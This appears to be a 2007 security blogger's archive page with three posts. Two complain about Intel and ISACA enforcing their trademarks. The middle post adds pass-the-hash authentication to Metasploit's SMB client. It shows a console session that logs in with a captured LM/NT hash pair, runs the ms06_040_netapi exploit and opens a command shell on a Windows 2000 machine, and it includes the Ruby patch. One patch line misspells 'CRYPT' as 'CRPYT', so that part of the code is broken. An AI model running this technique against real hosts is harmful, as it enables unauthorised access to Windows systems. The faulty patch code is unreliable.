Wednesday, May 23, 2007

Intel ISACA Intel ISACA Inside

In today's San Francisco Chronicle, David Lazarus writes on how Intel protects its trademarked name. I found it funny in relation to my friend's little ISACA episode I posted about. While I can understand that a company has to be vigilant with ensuring somebody isn't devaluing their name or causing consumer confusion but some things are just a little too surreal.

In this case Intel is saying a woman whose business is selling houses in the VA/DC/MD area can't use the name "IntelAgent" because it would like cause confusion. Their option was to use "IntelliAgent" since the intent was to combine the words "Intelligent" and "Agent" together - IntelAgent!

Of course "IntelliAgent" works if you're from the south where extra syllables (syl-ah-buhls) are added willy-nilly. IntelliAgent (in-tell-ee-ah-gent), "I is intelliagent."

Wednesday, May 09, 2007

Pass The Hash Support for Metasploit

Surprisingly Metasploit 3's SMB auth routines didn't support "pass the hash" so I took some time and put it in.
msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.110.1:42485 -> 192.168.110.130:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
The Patch:

Index: lib/rex/proto/smb/client.rb
===================================================================
--- lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

- hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
- hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ end

data = ''
data << hash_lm
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
- resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + ("\x00" * 16)

Tuesday, May 08, 2007

ISACA ISACA ISACA

Yesterday a friend of mine related a rather interesting tale. Like a lot of security-minded individuals he owns a domain and uses a unique username when giving out an e-mail address. Like "bugtraq@hisdomain.com" or "amazon@hisdomain.com" etc. The idea is when you receive spam for that username you can easily figure out who it was that released your e-mail address and reprimand, sue, jump up and down in a frenzy, and so on.

He recently passed the CISM exam from ISACA. He hadn't heard anything from them for a while so he calls them up. The conversation goes a little like this:

Him: Hi, I haven't received anything about my CISM. You said I passed but I don't have a certificate or anything yet.

ISACA: That's not right, let me look up your information. What's your (blah blah blah)

ISACA: Oh. I see, you're using ISACA in your e-mail address. That's trademarked and you can't do that.

Him: Really? That's really a strange policy. Make it hisname-ISACA@hisdomain.com then.

ISACA: I'm sorry, that's still in violation of the trademark.

Him: I don't beli... Fine, just remove the e-mail address entirely.

ISACA: But then we have no e-mail address and can't complete your certification.


I'm no lawyer but I believe in order to be violating a Trademark there has to be some potential or perceived confusion in the marketplace. At least that's how I read 15 U.S.C. 1125(c). If my friend's intent was to market himself as ISACA@hisdomain.com as being the real ISACA then I could see there being a clear violation that should be legally challenged.

There is a "Cyberprivacy" section of 1125(c) but that deals only with DOMAIN NAMES and not the username portion of an e-mail address. Also there's this little tidbit:
(i) has a bad faith intent to profit from that mark, including a personal name which is protected as a mark under this section;
How can ISACA really know his intent? I don't really understand the thought process that any mention of ISACA without the ® sign means the user is an infringer. Anyone?